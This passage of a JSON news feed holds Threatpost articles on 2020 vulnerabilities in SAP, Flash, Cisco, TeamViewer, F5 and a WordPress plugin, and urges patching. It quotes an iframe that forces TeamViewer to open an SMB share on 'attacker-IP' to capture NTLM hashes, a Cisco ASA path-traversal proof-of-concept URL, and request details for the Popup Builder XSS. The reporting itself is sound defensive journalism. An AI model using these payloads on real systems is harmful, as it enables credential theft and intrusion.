installations, 33 percent are in North America, 29 percent are in Europe and 27 percent are in Asia-Pacific.\n\n\u201cBecause of the type of unrestricted access an attacker would obtain by exploiting unpatched systems, this vulnerability also may constitute a deficiency in an enterprise\u2019s IT controls for regulatory mandates\u2014potentially impacting financial (Sarbanes-Oxley) and privacy (GDPR) compliance,\u201d according to the writeup.\n\n## Patch Available\n\nSAP\u2019s patch should be applied immediately, researchers recommended. While for now there is no indication that this has been exploited yet, Nunez told Threatpost that SAP customers should be on high alert now that the vulnerability has been announced and the DHS has sent out its US CERT alert warning.____\n\n\u201cNow that the vulnerability and patch have been released, skilled hackers can quickly develop exploit code,\u201d he said. \u201cBecause there are many vulnerable Internet exposed SAP systems, the complexity of the attack is significantly less.\u201d\n\nThat said, because of the complexity of mission-critical applications and limited maintenance windows, organizations are often challenged to rapidly apply SAP security notes, the Onapsis team acknowledged.\n\n\u201cIt\u2019s difficult to patch mission-critical applications such as those from SAP because they need to be constantly available,\u201d Nunez told Threatpost. \u201cTesting can take a long time depending upon complexity and customization of the apps. Also, there are limited maintenance windows available to apply the patches.\u201d\n\nHe added, \u201cFor SAP customers, critical vulnerabilities such as RECON highlight the need to protect mission-critical applications, by extending existing cybersecurity and compliance programs to ensure these applications are no longer in a blind spot. These systems are the lifeblood of the business and under the scope of strict compliance requirements, so there is simply nothing more important to secure.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n\n_ _\n", "cvss3": {}, "published": "2020-07-14T11:45:02", "type": "threatpost", "title": "Critical SAP Bug Allows Full Enterprise System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-6287"], "modified": "2020-07-14T11:45:02", "id": "THREATPOST:AA1F3088D813F95D476A024378F27010", "href": "https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:12:04", "description": "Adobe is warning of a critical vulnerability in its Flash Player application for users on Windows, macOS, Linux and ChromeOS operating systems.\n\nThe vulnerability is [the only flaw released this month](<https://blogs.adobe.com/psirt/?p=1925>) as part of Adobe\u2019s regularly scheduled patches (markedly less than the 18 flaws addressed [during its September regularly scheduled fixes](<https://threatpost.com/critical-adobe-flaws-attackers-javascript-browsers/159026/>)). However, it\u2019s a critical bug ([CVE-2020-9746](<https://nvd.nist.gov/vuln/detail/CVE-2020-9746>)), and if successfully exploited could lead to an exploitable crash, potentially resulting in arbitrary code execution in the context of the current user, according to Adobe.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cAs is typically the case for Flash Player vulnerabilities, web-based exploitation is the primary vector of exploitation but not the only one,\u201d according to Nick Colyer, senior product marketing manager with Automox, in an email. \u201cThese vulnerabilities can also be exploited through an embedded ActiveX control [[a feature in Remote Desktop Protocol](<https://threatpost.com/trickbot-activex-control-dropper/153370/>)] in a Microsoft Office document or any application that uses the Internet Explorer rendering engine.\u201d\n\nThe issue stems from a NULL pointer-dereference error. This type of issue occurs when a program attempts to read or write to memory with a NULL pointer. Running a program that contains a NULL pointer dereference generates an immediate segmentation fault error.\n\nAffected are versions 32.0.0.433 and earlier of Adobe Flash Desktop Runtime (for Windows, macOS and Linux); Adobe Flash Player for Google Chrome (Windows, macOS, Linux and Chrome OS) and Adobe Flash Player for Microsoft Edge and Internet Explorer 11 (Windows 10 and 8.1).\n\nA patch is available in version 32.0.0.445 across all affected platforms (see below). Adobe ranks the patch as a \u201cpriority 2,\u201d meaning that it \u201cresolves vulnerabilities in a product that has historically been at elevated risk\u201d \u2013 however, there are currently no known exploits.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13130904/adobe-flash-player.png>)\n\nAdobe Flash Player flaw updates\n\nFlash is known to be a favorite target for cyberattacks, particularly for exploit kits, [zero-day attacks](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) and phishing schemes. Of note, [Adobe announced in July 2017](<https://threatpost.com/patched-flash-player-sandbox-escape-leaked-windows-credentials/127378/>) that it plans to push Flash into an end-of-life state, meaning that it will no longer update or distribute Flash Player at the end of this year. In June, with Flash Player\u2019s Dec. 31 kill date quickly approaching, [Adobe said that it will start prompting users](<https://threatpost.com/adobe-prompts-users-to-uninstall-flash-player-as-eol-date-looms/156794/>) to uninstall the software in the coming months.\n\nFlash Player has previously caused headaches for system admins over the past year, with Adobe warning of critical issues that could allow for arbitrary code execution [in February](<https://threatpost.com/adobe-security-update-critical-flash-framemaker-flaws/152782/>) and [in June.](<https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/>)\n\nAdobe recommends that users update their product installations to the latest versions using the instructions referenced in the bulletin. As a security best practice, remediation of commonly exploitable or recurring threat vectors is always strongly encouraged, Colyer said.\n\n\u201cFor organizations that cannot remove Adobe Flash due to a business-critical function, it is recommended to mitigate the threat potential of these vulnerabilities by preventing Adobe Flash Player from running altogether via the killbit feature, set a Group Policy to turn off instantiation of Flash objects, or limit trust center settings prompting for active scripting elements,\u201d said Colyer.\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-10-13T17:46:11", "type": "threatpost", "title": "Critical Flash Player Flaw Opens Adobe Users to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9746"], "modified": "2020-10-13T17:46:11", "id": "THREATPOST:A9A57AE690BD069DB9BBA2CD154B315F", "href": "https://threatpost.com/flash-player-flaw-adobe-rce/160034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:19:01", "description": "Cisco has patched a high-severity flaw in its NX-OS software, the network operating system used by Cisco\u2019s Nexus-series Ethernet switches.\n\nIf exploited, the vulnerability could allow an unauthenticated, remote attacker to bypass the input access control lists (ACLs) configured on affected Nexus switches \u2013 and launch a denial of service (DoS) attacks on the devices.\n\n\u201cA successful exploit could cause the affected device to unexpectedly decapsulate the IP-in-IP packet and forward the inner IP packet,\u201d according to Cisco\u2019s security advisory, [published on Monday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ipip-dos-kCT9X4>). \u201cThis may result in IP packets bypassing input ACLs configured on the affected device or other security boundaries defined elsewhere in the network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2020-10136](<https://nvd.nist.gov/vuln/detail/CVE-2020-10136>)) stems from the network stack of Cisco\u2019s NX-OS software. Specifically, it exists in a tunneling protocol called IP-in-IP encapsulation. This protocol allows IP packets to be encapsulated inside another IP packet. The IP-in-IP protocol on the affected software were accepting IP-in-IP packets from any source \u2014 to any destination \u2014 without explicit configuration between the specified source and destination IP addresses.\n\nAn attacker could exploit this issue by sending a crafted IP-in-IP packet to an affected device. Cisco said that under \u201ccertain conditions,\u201d the crafted packets could cause the network stack process to crash and restart multiple times \u2014 ultimately leading to DoS for affected devices.\n\nSpecifically impacted by the flaw are the Nexus 1000, 3000, 5500, 5600, 6000, 7000 and 9000 series, as well as Cisco Unified Computing System (UCS) 6200 and 06300 Series Fabric Interconnects (see a full list of affected models below). Users can also check whether their version of Cisco NX-OS is impacted using a [checking tool available on Cisco\u2019s advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ipip-dos-kCT9X4>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/02110207/cisco-flaw.png>)\n\nUsers can update to the latest patch, and, \u201cif a device has the ability to disable IP-in-IP in its configuration, it is recommended that you disable IP-in-IP in all interfaces that do not require this feature,\u201d according to a [Tuesday CERT Coordination Center notice](<https://kb.cert.org/vuls/id/636397>). \u201cDevice manufacturers are urged to disable IP-in-IP in their default configuration and to require their customers to explicitly configure IP-in-IP as and when needed.\u201d\n\nProof-of-concept (PoC) exploit code was released for the bug by [Yannay Livneh](<https://github.com/CERTCC/PoC-Exploits/tree/master/cve-2020-10136>), who had also discovered the flaw.\n\n\u201cYou can use this code to verify if your device supports default IP-in-IP encapsulation from arbitrary sources to arbitrary destinations,\u201d said Livneh on GitHub. \u201cThe intended use of this code requires at least two more devices with distinct IP addresses for these two devices.\u201d\n\nCisco said it is \u201cnot aware of any public announcements or malicious use of the vulnerability.\u201d The vulnerability ranks 8.6 out of 10 on the CVSS scale, making it high severity.\n\nThe flaw [comes a week after Cisco announced](<https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/>) that attackers were able to compromise its servers, after exploiting two known, critical[ SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which are used in Cisco network-tooling products.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-02T16:16:31", "type": "threatpost", "title": "Severe Cisco DoS Flaw Can Cripple Nexus Switches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10136", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-02T16:16:31", "id": "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "href": "https://threatpost.com/cisco-dos-flaw-nexus-switches/156203/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-10-15T22:15:33", "description": "Popular remote-support software TeamViewer has patched a high-severity flaw in its desktop app for Windows. If exploited, the flaw could allow remote, unauthenticated attackers to execute code on users\u2019 systems or crack their TeamViewer passwords.\n\nTeamViewer is a proprietary software application used by businesses for remote-control functionalities, desktop sharing, online meetings, web conferencing and file transfer between computers. The recently discovered flaw stems from the Desktop for Windows app ([CVE-2020-13699](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699>)) not properly quoting its custom uniform resource identifier (URI) handlers.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)Apps need to identify the URIs for the websites they will handle. But because handler applications can receive data from untrusted sources, the URI values passed to the application may contain malicious data that attempts to exploit the app. In this specific case, values are not \u201cquoted\u201d by the app \u2013 meaning that TeamViewer will treat them as commands rather than as input values.\n\n\u201cAn attacker could embed a malicious iframe in a website with a crafted URL (&lt;iframe src=\u2019teamviewer10: \u2013play \\\\\\attacker-IP\\share\\fake.tvs\u2019&gt;) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,\u201d according [to an advisory](<https://jeffs.sh/CVEs/CVE-2020-13699.txt>) by Jeffrey Hofmann, security engineer at Praetorian, who disclosed the flaw.\n\nTo initiate the attack, the attacker could simply persuade a victim with TeamViewer installed on their system to click on crafted URL in a website \u2013 an opportunity for attackers to potentially [launch watering-hole attacks](<https://threatpost.com/watering-holes-asian-ethnic-flash-update-decoy/154323/>).\n\nThe URI will then trick the app into creating a connection with attacker-controlled remote Server Message Block (SMB) protocol. SMB is a network protocol used by Windows-based computers that allows systems within the same network to share files.\n\nAfter a victim\u2019s TeamViewer app initiates the remote SMB share, Windows will then make the connection using NT LAN Manager (NTLM). NTLM uses an encrypted protocol to authenticate a user without transferring the user\u2019s password. NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user\u2019s password.\n\nIn this attack scenario, the NTLM request can then be relayed by attackers using a tool like Responder, according to Hofmann. The Responder toolkit captures SMB authentication sessions on an internal network, and relays them to a target machine. This ultimately grants attackers access to the victim\u2019s machine, automatically. It also allows them to capture password hashes, which they can then crack via brute-force.\n\nFortunately for users, while the potential impact of this vulnerability is high, \u201cthe practical impact is low,\u201d Hofmann explained to Threatpost in an email. \u201cSuccessfully performing the attack is difficult and requires user interaction. There are a lot of prerequisites to exploit the vulnerability successfully. Every modern browser except for Firefox URL encodes spaces when handing off to URI handlers which effectively prevents this attack.\u201d\n\nThe flaw ranks 8.8 out of 10.0 on the CVSS scale, making it high severity. TeamViewer versions prior to 15.8.3 are vulnerable, and the bug affects various versions of TeamViewer, including: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 and tvvpn1.\n\nThe issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, said researchers.\n\nIn order to patch the flaw, \u201cWe implemented some improvements in URI handling relating to CVE 2020-13699,\u201d according to TeamViewer in a [statement sent to Threatpost](<https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448>). \u201cThank you, Jeffrey Hofmann with Praetorian, for your professionalism and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.\u201d\n\nIn a [security advisory regarding the flaw](<https://www.cisecurity.org/advisory/a-vulnerability-in-teamviewer-cloud-allow-for-offline-password-cracking_2020-106/>), the Center for Internet Security (CIS) recommended that TeamViewer users apply the appropriate patches. They also recommended that users avoid untrusted websites or links provided by unknown sources, and \u201ceducate users regarding threats posed by hypertext links contained in emails or attachments, especially from untrusted sources.\u201d\n\nTeamViewer\u2019s remote control functionalities make it a lucrative attack target for bad actors \u2013 especially with more enterprises turning to [collaboration apps like TeamViewer](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) during the pandemic. In 2019, a targeted, email-borne attack against embassy officials and government finance authorities globally [weaponized TeamViewer](<https://threatpost.com/teamviewer-attacks-state-department/144014/>) to gain full control of the infected computer. And earlier in 2020, [a newly discovered variant](<https://threatpost.com/cerberus-trojan-major-spyware-targeted-attack/155415/>) of the Cerberus Android trojan was discovered with vastly expanded and more sophisticated info-harvesting capabilities, and the ability to run TeamViewer.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-10T15:56:13", "type": "threatpost", "title": "TeamViewer Flaw in Windows App Allows Password-Cracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-13699", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-08-10T15:56:13", "id": "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "href": "https://threatpost.com/teamviewer-fhigh-severity-flaw-windows-app/158204/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:17:15", "description": "Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks\u2019 networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.\n\nLast week, F5 Networks issued urgent patches for the critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company\u2019s BIG-IP app delivery controllers, which are used for various networking functions, including app-security management and load-balancing. Despite a patch being available, Shodan [shows](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) almost 8,500 vulnerable devices are still available on the internet.\n\nNot long after the flaw was disclosed, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers and ultimately active exploits. Researchers warn that they\u2019ve seen attackers targeting the flaw over the weekend for various malicious activities, including launching [Mirai variant DvrHelper](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), deploying cryptocurrency mining malware and [scraping credentials](<https://twitter.com/GossiTheDog/status/1279856862888898568>) \u201cin an automated fashion.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nRich Warren, principal security consultant for NCC Group, [said Monday on Twitter](<https://twitter.com/buffaloverflow/status/1279384540847489024>) that \u201cas of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python.\u201d\n\n> Ok, we are seeing active exploitation of CVE-2020-5902\n> \n> Patch it today\n> \n> \u2014 Rich Warren (@buffaloverflow) [July 4, 2020](<https://twitter.com/buffaloverflow/status/1279384540847489024?ref_src=twsrc%5Etfw>)\n\nThe exploit of the flaw is trivial: Mikhail Klyuchnikov with Positive Technologies, [who originally discovered the flaw](<https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/>), said that in order to exploit the vulnerability, an unauthenticated attacker would only need to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.\n\n\u201cBy exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE1),\u201d Klyuchnikov said. \u201cThe attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network.\u201d\n\n[Vulnerable versions of BIG-IP (](<https://support.f5.com/csp/article/K52145254>)11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated to the corresponding fixed versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4), he said.\n\nAs more active exploits are detected in the wild, [F5 Networks](<https://twitter.com/F5Networks/status/1279022116868960257>), the [U.S. Cyber Command](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) and [Chris Krebs](<https://twitter.com/CISAKrebs/status/1279939623062581251>), director at the U.S. Cybersecurity and Infrastructure Security Agency (CISA), have all urged administrators to implement the offered fixes as soon as possible.\n\nAnother flaw was also fixed last week in BIG-IP that could allow an authenticated attacker to launch cross-site scripting attacks. The flaw ([CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>)) allows attackers to run malicious JavaScript code as a logged-in user.\n\nF5 Networks previously [dealt with security issues](<https://threatpost.com/authentication-bypass-bug-enterprise-vpns/143781/>) in 2019 when its VPN app (as well as ones built by Cisco, Palo Alto Networks and Pulse Secure) was discovered to improperly store authentication tokens and session cookies without encryption on a user\u2019s computer.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-06T19:06:20", "type": "threatpost", "title": "Admins Urged to Patch Critical F5 Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-06T19:06:20", "id": "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "href": "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:17", "description": "A high-severity vulnerability in Cisco\u2019s network security software could lay bare sensitive data \u2013 such as WebVPN configurations and web cookies \u2013 to remote, unauthenticated attackers.\n\nThe flaw exists in the web services interface of Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,\u201d according to a [Wednesday advisory from Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86>). \u201cA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)), which ranks 7.5 out of 10 on the CVSS scale, is due to a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the vulnerability allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\n\u201cThis vulnerability\u2026 is highly dangerous,\u201d said Mikhail Klyuchnikov of Positive Technologies, who was credited with independently reporting the flaw (along with Ahmed Aboul-Ela of RedForce), in a statement provided to Threatpost. \u201cThe cause is a failure to sufficiently verify inputs. An attacker can send a specially crafted HTTP request to gain access to the file system (RamFS), which stores data in RAM.\u201d\n\nA potential attacker can view files within the web services file system only. The web services file system is enabled for specific WebVPN and AnyConnect features (outlined in Cisco\u2019s advisory). The web services files that the attacker can view may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\nTo eliminate the vulnerability, Klyuchnikov urged Cisco users to update Cisco ASA to the most recent version. Cisco said it\u2019s not aware of any malicious exploits for the vulnerability \u2013 however, it is aware of proof-of-concept (POC) exploit code [released Wednesday](<https://twitter.com/aboul3la>) by security researcher Ahmed Aboul-Ela.\n\n> Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA &amp; Cisco Firepower.\n> \n> For example to read \"/+CSCOE+/portal_inc.lua\" file.\n> \n> https://&lt;domain&gt;/+CSCOT+/translation-table?type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;default-language&amp;lang=../\n> \n> Happy Hacking! [pic.twitter.com/aBA3R7akkC](<https://t.co/aBA3R7akkC>)\n> \n> \u2014 Ahmed Aboul-Ela (@aboul3la) [July 22, 2020](<https://twitter.com/aboul3la/status/1286012324722155525?ref_src=twsrc%5Etfw>)\n\nEarlier in May, Cisco stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) across its ASA and FTD network security products. The flaws could be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "cvss3": {}, "published": "2020-07-23T19:49:49", "type": "threatpost", "title": "Cisco Network Security Flaw Leaks Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452", "CVE-2020-5135"], "modified": "2020-07-23T19:49:49", "id": "THREATPOST:C51D2F2366676BB018956D93916AC33E", "href": "https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:22:53", "description": "Two vulnerabilities \u2013 including a high-severity flaw \u2013 have been patched in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\n[Popup Builder](<https://wordpress.org/plugins/popup-builder/>) helps users create and manage popups \u2013 such as marketing or promotional notices \u2013 for their websites. This week, software development company Sygnoos, the owner of Popup Builder, issued a patch addressing several vulnerabilities in the plugin.\n\n\u201cThese flaws have been patched in version 3.64.1 and we recommend that users update to the latest version available immediately,\u201d according to researchers with [Wordfence, on Thursday](<https://www.wordfence.com/blog/2020/03/vulnerabilities-patched-in-popup-builder-plugin-affecting-over-100000-sites/>). \u201cWhile we have not detected any malicious activity targeting Popup Builder, the stored XSS vulnerability can have a serious impact on site visitors and potentially even allow site takeover.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe more severe vulnerability (CVE-2020-10196) stems from a stored cross-site scripting (XSS) flaw in an AJAX hook used by the WordPress plugin. In WordPress plugin development, developers have the ability to register AJAX hooks, which allows them to call functions directly. However, in this specific plugin, the AJAX hook was available to unprivileged users, and it lacked nonce checks or capability checks for the functions called.\n\n\u201cThis meant that an unauthenticated attacker could send a POST request to wp-admin/admin-ajax.php with an array parameter, \u2018allPopupData\u2019, containing a number of key-value pairs, including a popup\u2019s ID (visible in the page source) and a malicious JavaScript payload, which would then be saved in that popup\u2019s settings and executed whenever a visitor navigated to a page where the popup was displayed,\u201d said researchers.\n\nWhile attackers typically use a vulnerability like this to redirect site visitors to [malvertising sites](<https://threatpost.com/wordpress-plugin-flaws-exploited-in-ongoing-malvertising-campaign/146629/>) or steal sensitive information from their browsers, researchers say that the flaw could also be exploited for site takeover if an administrator visited or previewed a page containing the infected popup while logged in.\n\nThe bug ranks 8.3 out of 10.0 on the CVSS severity scale. Version 3.63 of the plugin is affected; researchers urge users to update to version 3.64.1.\n\nPopup Builder also has another medium-severity vulnerability (CVE-2020-10195) that could be exploited by subscribers (users who are logged in, but with minimal permissions). Researchers said, by sending a request ($_POST ) to admin-post.php (with the \u2018action\u2019 parameter set to \u2018sgpbSaveSettings\u2019 and the \u2018sgpb-user-roles[]\u2019 parameter set to \u2018subscriber\u2019), an attacker could grant all subscriber-level users a number of permissions related to the plugin\u2019s functionality.\n\n\u201cIn addition to granting access to create and manage categories and newsletters, this would allow an attacker to make use of other AJAX functions that were protected by nonces, but not by capability checks, since usable nonces were displayed on these pages,\u201d said researchers. \u201cAlternatively, a $_POST request could be sent to admin-post.php with the \u2018action\u2019 parameter set to \u2018csv_file\u2019, making it possible to export a list of newsletter subscribers. As a result, an attacker could gain access to sensitive newsletter subscriber information and use this during a social engineering attack against those subscribers.\u201d\n\nEarlier this week, a [critical vulnerability](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) was found in a WordPress plugin known as \u201cThemeREX Addons\u201d that could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day. And earlier this month, researchers warned that active exploits were targeting a recently patched flaw in the popular [WordPress plugin Duplicator](<https://threatpost.com/active-attacks-duplicator-wordpress-plugin/153138/>), which has more than 1 million active installations. So far, researchers have seen 60,000 attempts to harvest sensitive information from victims.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-13T20:53:31", "type": "threatpost", "title": "WordPress Plugin Bug in Popup Builder Threatens 100K Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10195", "CVE-2020-10196", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-13T20:53:31", "id": "THREATPOST:023426685093FC21F8E5A7DE88AAB901", 